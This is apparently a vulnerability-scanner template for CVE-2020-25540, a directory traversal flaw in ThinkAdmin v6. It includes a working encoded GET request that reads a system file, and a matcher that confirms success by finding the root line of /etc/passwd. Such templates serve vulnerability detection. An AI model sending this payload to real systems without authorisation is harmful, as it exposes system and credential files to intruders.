id: cve-2020-25540 info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik severity: medium description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. # Reference:- https://www.exploit-db.com/exploits/48812 requests: - method: GET path: - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s' matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:"